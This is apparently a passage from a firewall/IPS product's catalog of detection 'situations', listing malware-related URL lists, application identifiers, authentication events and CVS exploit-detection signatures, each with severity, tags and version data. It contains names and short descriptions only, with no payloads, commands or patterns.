About this situation: URL category accounting data
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: This situation counts the number bytes sent and received for URL categorization.
Back to top

URL_List-Common_Global_CRL

About this situation: URL list of common global CRL distribution points.
Context: URL whitelist
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1788-5242
Last changed: sgpkg-ips-1788-5242
Description:
Back to top

URL_List-Common_Global_OCSP

About this situation: URL list of common global OCSP domains.
Context: URL whitelist
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1788-5242
Last changed: sgpkg-ips-1788-5242
Description:
Back to top

URL_List-Digmine-Cryptocurrency-Miner-URL

About this situation: An URL associated with the Digmine Cryptocurrency Miner malware was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-1027-5242
Last changed: sgpkg-ips-1027-5242
Description:
Back to top

URL_List-DNS-Over-HTTPS

About this situation:
Context: URL whitelist
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1639-5242
Last changed: sgpkg-ips-1639-5242
Description:
Back to top

URL_List-Emotet-Trojan

About this situation: An URL associated with Emotet trojan was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-894-5242
Last changed: sgpkg-ips-894-5242
Description: This URL list contains a list of known Emotet Botnet Command and Control hosts.
Back to top

URL_List-HIDDEN-COBRA-Domain

About this situation: An URL associated with HIDDEN COBRA activity was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1250-5242
Description:
Back to top

URL_List-Jaff-Ransomware-Download-URL

About this situation: An URL associated with The Jaff ransomware was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-902-5242
Last changed: sgpkg-ips-902-5242
Description:
Back to top

URL_List-Kaspersky-Update-Servers

About this situation: A URL associated with a Kaspersky Update Server was seen.
Context: URL whitelist
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Description:
Back to top

URL_List-Known-Hostile-URL

About this situation: Accessed URL is on a known hostile URL List.
Context: URL whitelist
Severity: 7
Tags: Suspected Compromise
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1555-5242
Description: This URL list is automatically generated and updated based on internal analysis on malicious traffic.
Back to top

URL_List-Known-Malicious-URL

About this situation: A known malicious URL was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-893-5242
Last changed: sgpkg-ips-893-5242
Description: This URL list gathers URLs known to be related to Botnets, exploit kits and other malicious actors.
Back to top

URL_List-Quant-Loader-URL

About this situation: An URL associated with the Quant Loader Trojan was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Description:
Back to top

URL_List-SunBurst-URL

About this situation: An URL associated with the SunBurst backdoor was seen.
Context: URL whitelist
Severity: 1
Tags: Compromise
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1305-5242
Description: This URL list contains a list of URLs associated with the SunBurst Backdoor. The below license applies to certain content of this situation: Copyright 2020 by FireEye, Inc. The 2-Clause BSD License Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Back to top

URL_List-The-Deception-Project-Domain

About this situation: An URL associated with The Deception Group was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-859-5242
Description:
Back to top

URL_List-TrickBot-Malware-Download-URL

About this situation: An URL associated with the TrickBot malware was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-927-5242
Last changed: sgpkg-ips-927-5242
Description:
Back to top

URL_List-URSNIF-Malware-URL

About this situation: An URL associated with the URSNIF malware was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-946-5242
Last changed: sgpkg-ips-946-5242
Description:
Back to top

URL_List-VPNFilter-IoC-URL

About this situation: An URL associated with the VPNFilter Botnet was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1070-5242
Description:
Back to top

URL_List-Wcry-Botnet

About this situation: An URL associated with Wcry botnet was seen.
Context: URL whitelist
Severity: 1
Tags: Suspected Compromise
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-903-5242
Description: This URL list contains a list of known Wcry Botnet Command and Control hosts.
Back to top

Us-Airways

About this situation: US Airways usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: This site allows users to purchase flights and vacation packages. Source: Wikipedia
Back to top

US-National-Institutes-of-Health

About this situation: U.S. National Institutes of Health usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-919-5242
Description: The National Institutes of Health (NIH), a part of the U.S. Department of Health and Human Services, is a federal medical research agency.
Back to top

US-National-Space-Agency

About this situation: U.S. National Space Agency usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Reference, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-919-5242
Description: U.S. National Space Agency usage has been detected.
Back to top

US-National-Weather-Service

About this situation: U.S. National Weather Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-628-5211
Description: This service is provided by U.S. Department of Commerce National Oceanic and Athmospheric Administration.
Back to top

US-NOAA

About this situation: U.S. National Oceanic and Athmospheric Administration usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-601-5211
Description: U.S. Department of Commerce National Oceanic and Athmospheric Administration usage has been detected.
Back to top

USAA

About this situation: Application USAA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: USAA is a financial services company that provides banking, insurance and investment products to the military community.
Back to top

Usabilityhub

About this situation: UsabilityHub usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: UsabilityHub is a collection of an online usability tests powered by their community of designers, developers and testers.
Back to top

Usabilla

About this situation: Application Usabilla detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Usabilla is a online application, which collect user feedback and improve websites, apps and emails.
Back to top

User Agent Stop Condition

About this situation: User Agent Stop Condition
Context: Local Correlation
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1694-5242
Last changed: sgpkg-ips-1694-5242
Description: Stop Condition to trigger either after the User-Agent header has been processed, or at the beginning if the traffic is not HTTP.
Back to top

User alert threshold exceeded

About this situation: Occurs when a threshold defined in a user alert check has been exceeded
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1296-5242
Description: User alert check. $([[$LN_USER_ALERT_CHECK_DESCRIPTION]])
Back to top

User Authentication HTTPS certificate expires soon

About this situation: User Authentication HTTPS certificate expires soon
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1535-5242
Description: The User Authentication HTTPS certificate for the engine expires in less than 90 days. Create a new User Authentication HTTPS certificate for the engine.
Back to top

User Authentication HTTPS certificate has expired

About this situation: User Authentication HTTPS certificate has expired
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1296-5242
Description: The User Authentication HTTPS certificate for the engine has expired. Create a new User Authentication HTTPS certificate for the engine.
Back to top

User does not exist

About this situation: User does not exist
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-521-5211
Description:
Back to top

User entered correct password/PIN

About this situation: User entered correct password/PIN
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-455-5211
Description:
Back to top

User entered wrong password/PIN

About this situation: User entered wrong password/PIN
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-455-5211
Description:
Back to top

User has been locked for access

About this situation: User has been locked for access
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

User has been locked for authentication

About this situation: User has been locked for authentication
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

User has been Time-lock locked

About this situation: User has been Time-lock locked
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

User has been Time-lock unlocked

About this situation: User has been Time-lock unlocked
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

User has been unlocked for access

About this situation: User has been unlocked for access
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

User has been unlocked for authentication

About this situation: User has been unlocked for authentication
Context: Authentication Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

User-Session-Closed

About this situation: User session closed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Description: User session closed.
Back to top

User-Session-Created

About this situation: User session created
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-816-5242
Description: User session created.
Back to top

UserEngage

About this situation: Application UserEngage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UserEngage is a marketing automation system aimed at boosting engagement and conversion with personalized automatic live chat messages, emails, SMS, forms and pop-ups.
Back to top

UseResponse

About this situation: Application UseResponse detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UseResponse is a customer feedback software, help desk, knowledge base and Social CRM that helps gather feedback and provide support.
Back to top

Userify

About this situation: Application Userify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Userify provides SSH Key management services for EC2 and the global enterprise, with VPC-compatible deployments, instant role changes, and an individual user portal for public key management.
Back to top

Userlike-Live-Chat

About this situation: Application Userlike-Live-Chat detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Userlike is a live chat software for websites.
Back to top

Userplane

About this situation: userplane usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

UserRules

About this situation: Application UserRules detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UserRules empowers your users to submit, discuss, vote and follow on feedback for your company and gives you single interface to manage your community forum.
Back to top

Usersnap

About this situation: Application Usersnap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Usersnap is a visual bug tracker for everyone working on a web project.
Back to top

UserTesting

About this situation: Application UserTesting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UserTesting online usability and user experience testing platform.
Back to top

Uservoice

About this situation: Uservoice usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1764-5242
Description: Uservoice usage detected. Uservoice is a web-based customer feedback and support ticket tool.
Back to top

Usga

About this situation: USGA usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: The United States Golf Association (USGA) is the United States' national association of golf courses, clubs, facilities, and the governing body of golf for the U.S. and Mexico. The USGA website allows you to view golf videos for the U.S. Open, U.S. Women's Open, U.S. Senior Open, and international matches. Source: Wikipedia
Back to top

USPS

About this situation: Application USPS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: USPS (United States Postal Service) is an independent agency of the United States Government responsible for providing postal service in the United States.
Back to top

Ustream

About this situation: Ustream usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-630-5211
Description: Ustream is a website that consists of a network of diverse channels providing a platform for lifecasting and live video streaming of events online.
Back to top

uStudio

About this situation: Application uStudio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: uStudio is an enterprise video platform company that helps organizations tap into the business value of video
Back to top

UTBox

About this situation: Application UTBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UTBox is provider of business-grade fax and SMS messaging solutions, currently supplying services to over 10,000 companies worldwide. The service portfolio includes fax broadcasting, SMS broadcasting, fax
Back to top

Utest

About this situation: Application Utest detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: uTest is the open community dedicated to professional testers and software testing. Its purpose is to promote and advance the testing profession.
Back to top

UTF TEXT File

About this situation: UTF16 or UTF32 text file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Applix Graphics
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

Utilibill

About this situation: Application Utilibill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Utilibill core foundation is blisteringly fast Billing engine
Back to top

Utilities-Online-Info

About this situation: Application Utilities-Online-Info detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Utilities Online Info is a service that provides Utilities and conversion Tools online.
Back to top

uTorrent

About this situation: Endpoint Context Agent based uTorrent Connection
Context: EI Correlation
Severity: 1
Tags: File Transfer, Endpoint
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1017-5242
Description: uTorrent endpoint application has been detected. uTorrent is used for transfering files over the BitTorrent peer-to-peer (p2p) file transfer protocol.
Back to top

uTypia

About this situation: Application uTypia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: uTypia develops internet shop solutions for products like rubber stamps, printed matter, signs. The software solutions are available for B2C and B2B customers.
Back to top

UUSee

About this situation: UUSee usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-630-5211
Description: UUSee is a Chinese peer-to-peer video streaming application/network which is designed to allow users to view media over the Internet from uusee.com.
Back to top

Uusi-Suomi

About this situation: Uusi Suomi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-666-5211
Description: Uusi Suomi is a Finnish news site.
Back to top

UW-Credit-Union

About this situation: Application UW-Credit-Union detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UW Credit Union offers all ranges of financial services
Back to top

vaadin

About this situation: Application vaadin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vaadin Ltd is an open source software development tool for building high quality web user interfaces for business software.
Back to top

Vakaka

About this situation: Vakaka usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to share content such as files, links, and videos.
Back to top

Valant

About this situation: Application Valant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Valant is a probider of behavioral health software for private practice, with a platform designed specifically for Enterprise size organisations.
Back to top

Valic

About this situation: Application Valic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VALIC serves as a plan provider for K-12 schools and school districts, as well as for higher education and healthcare institutions.
Back to top

Valmet-DNA-G3

About this situation: Valmet Dynamic Network of Applications G3 traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1336-5242
Last changed: sgpkg-ips-1354-5242
Description: Valmet DNA, or Valmet Dynamic Network of Applications, is a process automation system. This network application identifies the generation 3.
Back to top

Valmet-DNA-G4

About this situation: Valmet Dynamic Network of Applications G4 traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Description: Valmet DNA, or Valmet Dynamic Network of Applications, is a process automation system. This network application identifies the generation 4.
Back to top

Valve-Steam

About this situation: Valve Steam traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1794-5242
Description: Valve Steam online gaming client usage has been detected.
Back to top

Valve-Steam-Gaming

About this situation: Valve Steam gaming traffic
Context: Application Context
Severity: 1
Tags: Protocols, Games
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1145-5242
Description: Valve Steam online gaming client usage has been detected.
Back to top

Vanguard

About this situation: Application Vanguard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vanguard is the investment company. Vanguard offers mutual funds, ETFs, advice, and related services to financial professionals, institutional investors, and individual investors.
Back to top

Vanilla-Forums

About this situation: Application Vanilla-Forums detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vanilla Forums allows you to create an online community by using cloud forum software.
Back to top

VanillaSoft

About this situation: Application VanillaSoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VanillaSoft - web based on-demand sales platform, store data and report on it - drive productivity.
Back to top

Vantiv

About this situation: Application Vantiv detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vantivis a payment processing and technology provider. The company provides payment and technology services to merchants and financial institutions.
Back to top

Vaultive

About this situation: Application Vaultive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vaultive secures Microsoft Office 365 and other SaaS applications by encrypting data before it is transmitted to the cloud.
Back to top

VaultLogix

About this situation: Application VaultLogix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VaultLogixis online backup solutions safeguard business data based upon the particular needs of each business.
Back to top

vAuto

About this situation: Application vAuto detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VAuto, Inc. provides Web-based inventory management solutions for retail automotive dealerships in the United States.
Back to top

vBulletin

About this situation: Application vBulletin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: vBulletin provides the online community software enabling engaged communities and effective monetization.
Back to top

VBVoice

About this situation: Application VBVoice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pronexus VBVoice7 is application development toolkit for Interactive Voice Response (IVR) solutions. VBVoice enables the creation of feature-rich inbound and outbound IVR applications.
Back to top

vCita

About this situation: Application vCita detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: vCita lets your online audience approach you, ask for advice or schedule a phone or video call.
Back to top

vCloud-Express

About this situation: Application vCloud-Express detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Enables customers to upload that complete virtual machine to vCloud Express. Once they build a virtual machine precisely as desired, that virtual machine may be uploaded to vCloud Express and imported into their environment.
Back to top

VC_CVS-Annotate-Command-Long-Revision-String-Buffer-Overflow

About this situation: Detects annotate command buffer overflow exploits against CVS
Context: CVSP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, CVS, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: CVS-Annotate-Command-Long-Revision-String-Buffer-Overflow
Description:
Back to top

VC_CVS-Argumentx-Command-Double-Free

About this situation: Attempt to exploit the Argumentx double-free vulnerability in CVS
Context: CVSP Client Stream
Severity: 10
Tags: Linux, Any Hardware, CVS, CVE2004, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: CVS-Error-Prog-Name-Double-Free
Description:
Back to top

VC_CVS-Directory-Request-Double-Free

About this situation: Detects an attempt to exploit the directory request double-free heap corruption vulnerability in CVS
Context: CVSP Client Stream
Severity: 10
Tags: Unix, Any Hardware, CVS, CVE2003, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: CVS-Directory-Request-Double-Free-Heap-Corruption-Vulnerability
Description:
Back to top

VC_CVS-Entry-Line-Flag-Heap-Overflow-BSD

About this situation: Attempt to exploit CVS entry line flag insertion heap overflow on Bsd
Context: CVSP Client Stream
Severity: 10
Tags: BSD, Any Hardware, CVS, CVE2004, BSD not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-720-5211
Vulnerability: CVS-Entry-Line-Flag-Heap-Overflow
Description:
Back to top

VC_CVS-Entry-Line-Flag-Heap-Overflow-Linux

About this situation: Attempt to exploit CVS entry line flag insertion heap overflow on Linux
Context: CVSP Client Stream
Severity: 10
Tags: Linux, Any Hardware, CVS, CVE2004, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: CVS-Entry-Line-Flag-Heap-Overflow
Description:
Back to top

VC_CVS-Error-Prog-Name-Double-Free

About this situation: Attempt to exploit the error_prog_name double-free vulnerability in CVS
Context: CVSP Client Stream
Severity: 10
Tags: Linux, Any Hardware, CVS, CVE2004, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: CVS-Error-Prog-Name-Double-Free
Description:
Back to top

VC_CVS-File-Existence-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in CVS detected
Context: CVSP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVS, CVE2004, Any Operating System not specific, Suspected Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: CVS-File-Existence-Information-Disclosure
Description:
Back to top

VC_CVS-Max-Dotdot-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in CVS server detected
Context: CVSP Client Stream
Severity: 7
Tags: Linux, Any Hardware, CVS, CVE2004, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: CVS-Max-Dotdot-Integer-Overflow
Description:
Back to top

Vedivi

About this situation: Vedivi usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Vedivi is a remote desktop application.
Back to top

Veeqo

About this situation: Application Veeqo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Veeqo is a web based application that enables users to manage orders and inventory.
Back to top

Veetle

About this situation: Veetle usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-630-5211
Description: Veetle is a video streaming service where users can upload, watch, stream live videos.
Back to top

Veeva-Systems

About this situation: Application Veeva-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Veeva Systems - Cloud-Based Business Solutions for the Global Life Sciences Industry.
Back to top

Vehicles

About this situation: Sites that provide information about or promote vehicles, including those that support online purchase of vehicles or parts.
Context: URL Application Context
Severity: 1
Tags: Vehicles, Productivity Loss, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote vehicles, including those that support online purchase of vehicles or parts.
Back to top

Vektr

About this situation: Application Vektr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VEKTR software makes it possible for field inspections, audits, and other functions to be managed in real time.
Back to top

Velaro

About this situation: Application Velaro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Velaro provides live help platform that allows companies to engage with website visitors.
Back to top

Velocify

About this situation: Application Velocify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Velocify is a provider of cloud-based intelligent sales software, designed for high-velocity sales environments.
Back to top

Velpic

About this situation: Application Velpic detected
Context: Application Context
Severity: 1
